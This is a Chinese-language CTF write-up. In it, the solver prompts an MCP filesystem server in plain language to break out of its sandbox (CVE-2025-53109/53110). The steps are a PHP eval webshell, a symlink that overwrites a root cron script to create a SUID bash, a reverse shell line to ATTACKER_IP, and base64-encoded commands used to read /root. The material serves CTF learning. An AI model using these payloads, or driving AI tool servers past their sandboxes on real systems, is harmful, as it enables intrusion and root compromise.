本题考点:
视频 WriteUp
信息收集 #1
探测发现沙箱位于 /var/www/h
猜测 Web 根目录位于常见的 /var/www/html
CVE-2025-53109
尝试查看 /var/www/html 有什么文件
text
当前位于哪个目录下text
/var/www/html下面有什么
这证实了存在漏洞 CVE-2025-53109,也探测出了后端是 php
写入一句话木马
text
给/var/www/html/shell.php写入<?php @eval($_POST['c']); ?>
直接拿蚁剑连接
信息收集 #2
查看用户组信息,发现用户组 mcp
bash
getent group查找属于 mcp 组的文件
bash
find / -group mcp -ls 2>/dev/null | grep 'root'
sessionclean 很可能是提权点
CVE-2025-53110
利用 webshell 在 Web 目录下创建一个指向 sessionclean 的软链接
bash
ln -s /usr/lib/php/sessionclean /var/www/html/pwn指示 MCP 向软链接 /var/www/html/pwn 写入恶意 Payload 覆盖 sessionclean
text
往文件/var/www/html/pwn写入以下内容:#!/bin/bashcp /bin/bash /var/www/html/rootbashchmod +xs /var/www/html/rootbash
等待 Cron 守护进程下一次唤醒(0-60秒),root 用户执行被篡改的脚本,生成了带有 SUID 位的 Bash
验证一下:
获取 flag
解法 1 - 反弹 shell
在攻击机监听:
bash
nc -lvvp 1337在 webshell 执行:
bash
bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/1337 0>&1'
利用 rootbash 提权(-p (privileged) 参数用于保留 euid=0)
text
./rootbash -p
解法 2 - 直接利用 rootbash 读取 flag 文件
ls -la /root
bash
(www-data:/var/www/html) $ echo bHMgLWxhIC9yb290 | base64 -d | ./rootbash -ptotal 36drwx------ 1 root root 4096 Dec 1 16:32 .drwxr-xr-x 1 root root 4096 Dec 1 17:12 ..-rw-r--r-- 1 root root 3106 Apr 22 2024 .bashrcdrwxr-xr-x 4 root root 4096 Dec 1 03:25 .npm-rw-r--r-- 1 root root 161 Apr 22 2024 .profiledrwx------ 2 root root 4096 Nov 30 16:19 .ssh-r-------- 1 root root 41 Dec 1 16:32 7h3_Tru3_53cret_!$_H!dden_W17#!n_T#15_F1le-rw-r--r-- 1 root root 98 Dec 1 16:32 flag-rw-r--r-- 1 root root 98 Dec 1 16:32 flag.txtcat /root/'7h3_Tru3_53cret_!$_H!dden_W17#!n_T#15_F1le'
bash
(www-data:/var/www/html) $ echo Y2F0IC9yb290Lyc3aDNfVHJ1M181M2NyZXRfISRfSCFkZGVuX1cxNyMhbl9UIzE1X0YxbGUn | base64 -d | ./rootbash -pflag{...}